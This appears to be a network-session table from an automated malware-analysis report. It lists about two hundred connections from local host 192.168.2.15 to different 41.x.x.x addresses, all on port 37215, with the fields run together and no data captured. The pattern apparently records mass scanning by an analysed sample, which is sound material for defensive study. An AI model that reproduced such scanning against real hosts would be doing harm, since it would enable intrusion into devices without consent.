                                                                            18550192.168.2.154568641.136.88.13737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18551192.168.2.155176841.44.240.25037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18552192.168.2.153608841.99.159.16637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18553192.168.2.155163041.191.63.3337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18554192.168.2.156078441.103.66.14537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18555192.168.2.154953441.124.141.3037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18556192.168.2.154245841.128.149.6537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18557192.168.2.155578841.98.198.6337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18558192.168.2.153334841.186.25.537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18559192.168.2.155844041.242.150.4937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18560192.168.2.154435241.100.63.8637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18561192.168.2.155997041.137.152.16437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18562192.168.2.153734641.128.73.21237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18563192.168.2.153696041.93.25.14837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18564192.168.2.155465841.9.218.9637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18565192.168.2.154984841.38.48.14937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18566192.168.2.156022441.60.55.17037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18567192.168.2.154346441.53.97.16637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18568192.168.2.155068241.207.227.6337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18569192.168.2.155217041.53.188.2837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18570192.168.2.153689041.16.197.4537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18571192.168.2.155027441.203.138.16837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18572192.168.2.155192441.66.194.1037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18573192.168.2.154820041.18.131.4237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18574192.168.2.153953641.19.127.16337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18575192.168.2.155445241.44.77.20937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18576192.168.2.155558241.3.92.10037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18577192.168.2.154122441.67.194.19537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18578192.168.2.154150241.184.116.12237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18579192.168.2.154919641.180.4.11537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18580192.168.2.155580041.122.132.19837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18581192.168.2.155199441.110.101.137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18582192.168.2.153849641.104.228.5637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18583192.168.2.155015241.103.248.2637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18584192.168.2.153752441.143.11.4337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18585192.168.2.154480641.133.1.5437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18586192.168.2.153729041.251.63.9737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18587192.168.2.153367841.92.95.3637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18588192.168.2.155146241.149.67.3137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18589192.168.2.155654841.76.74.23137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18590192.168.2.153774641.213.147.5437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18591192.168.2.153809241.18.165.22837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18592192.168.2.155513441.196.109.12737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18593192.168.2.154460041.237.62.5237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18594192.168.2.153390441.165.5.1837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18595192.168.2.156082241.159.39.2037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18596192.168.2.155856241.237.219.15537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18597192.168.2.153844441.193.10.8237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18598192.168.2.154343041.61.171.13537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18599192.168.2.155162641.169.41.5337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18600192.168.2.153623441.22.127.18337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18601192.168.2.153826841.23.189.10937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18602192.168.2.154109441.188.15.7037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18603192.168.2.154111841.121.56.19037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18604192.168.2.153966841.177.108.3637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18605192.168.2.154492641.50.217.14137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18606192.168.2.155896041.12.62.23737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18607192.168.2.154233441.10.141.4037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18608192.168.2.153810641.140.159.5237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18609192.168.2.154107441.212.156.4437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18610192.168.2.155279841.60.142.23137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18611192.168.2.153853441.143.234.9137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18612192.168.2.153455641.58.195.13537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18613192.168.2.153776241.180.4.17237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18614192.168.2.155452041.69.133.19137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18615192.168.2.155663241.71.176.10837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18616192.168.2.154923641.27.251.14737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18617192.168.2.154840041.142.4.10537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18618192.168.2.154210241.50.56.10837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18619192.168.2.155415841.215.159.437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18620192.168.2.155982441.245.117.10937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18621192.168.2.155219441.245.2.3537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18622192.168.2.155530841.215.219.4837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18623192.168.2.154669441.32.38.20437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18624192.168.2.154136641.204.247.24537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18625192.168.2.153878841.22.104.3937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18626192.168.2.153322641.78.87.8337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18627192.168.2.155783441.152.147.15937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18628192.168.2.154761241.242.181.20237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18629192.168.2.154253841.20.247.15237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18630192.168.2.155025641.59.185.21437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18631192.168.2.153713441.123.25.637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18632192.168.2.153581241.183.76.21437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18633192.168.2.155883241.91.31.10837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18634192.168.2.153832841.160.146.17837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18635192.168.2.154109441.144.132.5337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18636192.168.2.155257041.78.156.14037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18637192.168.2.154426041.51.15.5137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18638192.168.2.155292241.14.153.18037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18639192.168.2.153661841.71.34.5137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18640192.168.2.153766641.211.86.15437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18641192.168.2.153530841.204.174.19137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18642192.168.2.155501041.52.99.9937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18643192.168.2.153985641.234.238.19737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18644192.168.2.156037241.72.155.11637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18645192.168.2.155590641.189.138.4737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18646192.168.2.156038641.67.122.5337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18647192.168.2.155346841.3.215.20037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18648192.168.2.155732841.192.41.1737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18649192.168.2.153752441.75.66.12937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18650192.168.2.153814441.189.245.9337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18651192.168.2.153615641.140.21.25337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18652192.168.2.155185641.254.135.5537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18653192.168.2.154252441.16.115.22437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18654192.168.2.154603241.1.65.10537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18655192.168.2.153522841.135.46.3037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18656192.168.2.153412441.132.11.23137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18657192.168.2.154434241.161.217.21437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18658192.168.2.155507641.58.84.22737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18659192.168.2.154894441.86.214.6537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18660192.168.2.153870841.207.244.9737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18661192.168.2.154721641.47.196.5337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18662192.168.2.155517041.210.233.25437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18663192.168.2.154926841.249.1.1437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18664192.168.2.156022641.161.156.11937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18665192.168.2.153405041.94.31.2637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18666192.168.2.153723641.250.178.22637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18667192.168.2.155851041.126.4.9837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18668192.168.2.156005441.37.180.5637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18669192.168.2.155671241.246.83.22137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18670192.168.2.154819641.92.88.25037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18671192.168.2.155946041.162.207.1537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18672192.168.2.153963041.64.153.23637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18673192.168.2.154573441.83.157.25137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18674192.168.2.155150241.215.201.23037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18675192.168.2.153983441.225.7.25237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18676192.168.2.154299241.131.138.16437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18677192.168.2.153316641.244.40.5837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18678192.168.2.153524041.122.31.12837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18679192.168.2.154064441.40.228.18737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18680192.168.2.154037641.195.148.16137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18681192.168.2.155682641.249.63.2237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18682192.168.2.153527441.9.190.19437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18683192.168.2.153329841.82.135.23537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18684192.168.2.153941641.211.221.7137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18685192.168.2.154246841.46.2.23237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18686192.168.2.155003841.41.47.1237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18687192.168.2.155015641.250.186.7637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18688192.168.2.155724241.249.86.21337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18689192.168.2.154195241.115.59.13237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18690192.168.2.155966841.95.34.20037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18691192.168.2.155991441.54.227.17837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18692192.168.2.154636241.40.160.3637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18693192.168.2.155745841.163.212.15137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18694192.168.2.154562641.180.108.6937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18695192.168.2.154489241.186.19.17537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18696192.168.2.153942641.2.103.8237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18697192.168.2.153827841.34.204.12137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18698192.168.2.153467841.201.228.6537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18699192.168.2.153662241.36.181.11737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18700192.168.2.153481641.28.234.21437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18701192.168.2.154862241.59.113.10237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18702192.168.2.154090841.164.122.12137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18703192.168.2.156057441.78.0.18637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18704192.168.2.155269441.62.173.21737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18705192.168.2.154322841.128.52.5037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18706192.168.2.155780441.173.107.20837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18707192.168.2.155931641.50.65.4337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18708192.168.2.154806441.188.180.4637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18709192.168.2.153873041.114.224.6737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18710192.168.2.153545241.77.101.5637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18711192.168.2.155175641.32.38.5737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18712192.168.2.155918441.157.149.12037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18713192.168.2.154043641.235.144.18037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18714192.168.2.156036841.119.227.19137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18715192.168.2.154318641.91.88.17537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18716192.168.2.154042841.66.68.4837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18717192.168.2.153531441.74.137.15637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18718192.168.2.155094041.122.92.20637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18719192.168.2.154031441.215.172.5437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18720192.168.2.155753841.222.89.20037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18721192.168.2.155183241.217.211.19337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18722192.168.2.153531841.135.24.5537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18723192.168.2.154910241.199.247.20837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18724192.168.2.156041241.180.127.10737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18725192.168.2.155186041.113.26.19437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18726192.168.2.155838041.116.234.22337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18727192.168.2.155547841.74.200.12237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18728192.168.2.153641841.171.247.2137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18729192.168.2.155751641.193.218.10837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18730192.168.2.154783441.82.192.10737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18731192.168.2.153752841.114.37.18137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18732192.168.2.154065841.17.224.21137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18733192.168.2.155185041.148.231.13237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18734192.168.2.155448841.235.94.1937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18735192.168.2.154919241.81.241.12637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18736192.168.2.155481841.224.58.15437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18737192.168.2.155434241.84.148.24537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18738192.168.2.153476041.126.217.4137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18739192.168.2.156028641.158.130.14837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18740192.168.2.155213441.134.6.20237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18741192.168.2.154804241.66.120.8637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18742192.168.2.154034441.201.166.12237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18743192.168.2.153345041.155.46.2237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18744192.168.2.153686841.137.137.18737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18745192.168.2.153477641.2.126.9237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18746192.168.2.155699841.181.159.21437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18747192.168.2.155256441.66.236.237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18748192.168.2.155894241.13.59.21437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18749192.168.2.153532841.91.150.9037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18750192.168.2.155760841.159.69.937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18751192.168.2.154452641.95.238.7937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            18752192.168.2.153362041.124.91.23637215
                                                                            TimestampBytes transferredDirectionData


